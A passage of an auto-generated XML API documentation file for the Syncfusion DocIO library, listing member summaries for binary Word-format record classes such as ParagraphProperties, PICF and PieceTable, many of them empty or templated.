        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphHeight.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties">
            <summary>
            Summary description for CharacterProperty.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_papx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_topBorder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_leftBorder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_bottomBorder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_rightBorder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_betweenBorder">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.m_barBorder">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.#ctor">
            <summary>
            Default constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertyException)">
            <summary>
            Initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.HasOptions(System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetCopiableSprm">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetCopiableTableSprm">
            <summary>
            
            </summary>
            <returns></returns>
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetTabsInfo(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetBorder(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetShading(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="record"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetLineSpacingDescriptor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Gets the line spacing descriptor.
            </summary>
            <param name="record">The record.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.RemoveListSprms">
            <summary>
            Removes the list Single Property Modifier Record Array.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.WriteEmptyList">
            <summary>
            Writes the empty list.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ClonePapx">
            <summary>
            Returns object with cloned members
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetNewSprm(System.Int32)">
            <summary>
            Gets the new (added when track changes property is on) Single Property Modifier Record.
            </summary>
            <param name="option">The option.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.GetNewPropsStartIndex">
            <summary>
            Gets the index of the new (changed) paragraph properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeftFirstChars">
            <summary>
            Gets/sets the value that represents the paragraph first line indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeftChars">
            <summary>
            Gets/sets the value that represents the paragraph left indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentRightChars">
            <summary>
            Gets/sets the value that represents the paragraph right indent in character units.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Sprms">
            <summary>
            Gets sprms
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ParagraphPropertyException">
            <summary>
            Gets ParagraphPropertyException.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Justification">
            <summary>
            Gets/sets justification of a paragraph;
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Keep">
            <summary>
            True - all lines in the paragraph are to remain on the same page.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.KeepFollow">
            <summary>
            True - the paragraph is to remain on the same page as the paragraph that follows it,
            if possible
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.PageBreakBefore">
            <summary>
            True - a page break is forced before the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeftFirst">
            <summary>
            Gets/sets the value (in points) that represents the left indent for 
            of the first line of the paragraph
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeft">
            <summary>
            Gets/sets the value (in points) that represents the left indent for a paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentRight">
            <summary>
            Gets/sets the value (in points) that represents the left indent for a paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BeforeLines">
            <summary>
            Gets/sets the before lines
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.AfterLines">
            <summary>
            Gets/sets the after lines 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BeforeSpacing">
            <summary>
            Gets/sets the spacing (in points) before the paragraph. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.AfterSpacing">
            <summary>
            Gets/sets the spacing (in points) after the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ShadingValue">
            <summary>
            Gets the shading value.
            </summary>
            <value>The shading value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Shading">
            <summary>
            Gets/sets the ShadingDescriptor object that refers to the shading 
            formatting for the paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ShadingNewValue">
            <summary>
            Gets the shading value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ShadingNew">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.MirrorIndents">
            <summary>
            Gets/sets Mirror Indents
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.WidowControl">
            <summary>
            Gets/sets widow control
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.AutoSpaceDN">
            <summary>
            Gets/sets AutoSpaceDN
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.AutoSpaceDE">
            <summary>
            Gets/sets AutoSpaceDE
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.AdjustRightIndent">
            <summary>
            Gets/sets AdjustRightIndent
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.StickProperties">
            <summary>
            Copy paragraph properties or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ListFormatIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.NewListFormatIndex">
            <summary>
            Gets the new index of the list format.
            </summary>
            <value>The new index of the list format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.OutlineNumbered">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ListLevelIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.NewListLevelIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsList">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ChgTabsPapx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ChgTabs">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TabsInfo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ListTabs">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.LineSpacingDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.SpacingBeforeAuto">
            <summary>
            Defines whether spacing before is automatic.
            </summary>
            <value>The spacing before auto.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.SpacingAfterAuto">
            <summary>
            Defines whether spacing after is automatic.
            </summary>
            <value>The spacing before auto.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.OutlineLevel">
            <summary>
            Gets or sets the outline level.
            </summary>
            <value>The outline level.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsChangedFormat">
            <summary>
            Gets a value indicating whether this format is or was changed.
            </summary>
            <value>
            	 if this format changed format, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ContextualSpacing">
            <summary>
            Gets or sets a value indicating whether [contextual spacing].
            </summary>
            <value> if it is contextual spacing, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.SuppressAutoHyphens">
            <summary>
            Gets or sets a value indicating whether to suppress automatic hyphenation for the paragraph.
            </summary>
            <value><c>true</c> if suppress auto hyphens; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.Bidi">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.JustificationBidi">
            <summary>
            Gets/sets justification of a paragraph;
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeftFirstBi">
            <summary>
            Gets/sets the value (in points) that represents the left indent for 
            of the first line of the bidi paragraph
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentLeftBi">
            <summary>
            Gets/sets the value (in points) that represents the left indent for a bidi paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IndentRightBi">
            <summary>
            Gets/sets the value (in points) that represents the left indent for a bidi paragraph.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TopBorder">
            <summary>
            Gets/sets top BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BetweenBorder">
            <summary>
            Gets/sets top BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BarBorder">
            <summary>
            Gets/sets top BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BottomBorder">
            <summary>
            Gets/sets bottom BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.LeftBorder">
            <summary>
            Gets/sets left BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.RightBorder">
            <summary>
            Gets/sets right BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TopBorderNew">
            <summary>
            Gets/sets top BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BottomBorderNew">
            <summary>
            Gets/sets bottom BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.LeftBorderNew">
            <summary>
            Gets/sets left BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.RightBorderNew">
            <summary>
            Gets/sets right BorderCode object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BetweenBorderNew">
            <summary>
            Gets or sets the between border new.
            </summary>
            <value>
            The between border new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.BarBorderNew">
            <summary>
            Gets or sets the bar border new.
            </summary>
            <value>
            The bar border new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsCellMark">
            <summary>
            Is it a cellmark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsRowMark">
            <summary>
            Is it a rowmark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableXLeft">
            <summary>
             Is called to adjust the x position within a column which marks 
             the left boundary of text within the first cell of a table row.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableYRowHeight">
            <summary>
             Gets/sets height of the table row
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableXGapHalf">
            <summary>
            Adjusts the white space that is maintained between columns. 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableBorders">
            <summary>
            Gets/sets TableBorders object that describes a table row borders
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableBordersNew">
            <summary>
            Gets/sets TableBorders object that describes a table row borders
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableRowProperties">
            <summary>
            Gets/sets table row properies
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TablesNestingLevel">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsSubCell">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsSubRow">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsCantSplit">
            <summary>
            Is it not allow split.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsCantSplit90">
            <summary>
            Is it not allow split.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableAlignment">
            <summary>
            Gets or sets the table alignment.
            </summary>
            <value>The table alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableJustification">
            <summary>
            Gets or sets the table justification.
            </summary>
            <value>
            The table justification.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.TableWidthIndent">
            <summary>
            Gets/sets internal width indent.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameXCoordinate">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameYCoordinate">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameWidth">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FramePc">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameVerticalPos">
            <summary>
            Gets the frame vertical pos.
            </summary>
            <value>The frame vertical pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameHorizontalPos">
            <summary>
            Gets the frame horizontal pos.
            </summary>
            <value>The frame horizontal pos.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.IsFrame">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameHeight">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.WrapFrameAround">
            <summary>
            Gets or sets the Wrapping around type of the frame.
            </summary>
            <value>The vertical distance from text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameHorizontalDistanceFromText">
            <summary>
            Gets or sets the frame horizontal distance from text.
            </summary>
            <value>The frame horizontal distance from text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.FrameVerticalDistanceFromText">
            <summary>
            Gets or sets the frame vertical distance from text.
            </summary>
            <value>The frame vertical distance from text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.ParagraphStyleId">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.PresentRowDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.PresentTableBorders">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphProperties.PTableProps">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage">
            <summary>
            Summary description for FKPForCharacterProperties = ParagraphPropertiesPage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.DEF_FC_SIZE">
            <summary>
            Size of the FC (File Character position).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.m_arrFC">
            <summary>
            Each FC is the limit FC of a run of exception text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.m_arrHeight">
            <summary>
            An array of the BX data structure. The ith BX entry in the array describes
            the paragraph beginneing at fkp.rgfc[ i ].
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.m_arrPAPX">
            <summary>
            Consists of all of the CHPXs stored in FKP concatenated end to end.
            Each CHPX is prefixed with a count of bytes which records its length.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure)">
            <summary>
            
            </summary>
            <param name="structure"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Parse(Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.FKPStructure)">
            <summary>
            
            </summary>
            <param name="structure"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Save">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.FileCharPos">
            <summary>
            Each FC is the limit FC of a run of exception text.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Heights">
            <summary>
            An array of the BX data structure. The ith BX entry in the array describes
            the paragraph beginneing at fkp.rgfc[ i ].
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.ParagraphProperties">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.RunsCount">
            <summary>
            Count of runs.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.ParagraphPropertiesPage.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF">
            <summary>
            Summary description for PICF.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.DEF_PICF_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.#ctor(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.Read(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.Clone">
            <summary>
            Clones current PictureDescriptor.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.SetBasePictureOptions(System.Int32,System.Int32,System.Single,System.Single)">
            <summary>
            
            </summary>
            <param name="height"></param>
            <param name="width"></param>
            <param name="heightScale"></param>
            <param name="widthScale"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.ScaleHeight">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.ScaleWidth">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.ScaleX">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.ScaleY">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.BorderTop">
            <summary>
            Gets the border top.
            </summary>
            <value>The border top.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.BorderLeft">
            <summary>
            Gets the border left.
            </summary>
            <value>The border left.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.BorderRight">
            <summary>
            Gets the border right.
            </summary>
            <value>The border right.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PICF.BorderBottom">
            <summary>
            Gets the border bottom.
            </summary>
            <value>The border bottom.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.RECORD_SIZE">
            <summary>
            Size of the record in bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.m_field">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.#ctor(System.Byte[])">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.fNoParaLast">
            <summary>
            when 1, means that piece contains no end of paragraph marks.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.fPaphNil">
            <summary>
            used internally by Word
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.fCopied">
            <summary>
            used internally by Word
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.FileOffset">
            <summary>
            file offset of beginning of piece. The size of the ith piece can be determined by subtracting rgcp[i] of the containing plcfpcd from its rgcp[i+1].
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.PropertyModifier">
            <summary>
            contains either a single sprm or else an index number of the grpprl which contains the sprms that modify the properties of the piece.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.UnderlyingStructure">
            <summary>
            Returns underlying structure. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceDescriptorRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable">
            <summary>
            Summary description for BinaryTable.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.m_arrFC">
            <summary>
            Array of file positions (n+1).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.m_arrEntry">
            <summary>
            Array of talbe entries (n).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.#ctor(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.Parse(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.PieceTable.Save(System.Byte[],System.Int32)">
            <summary>
            
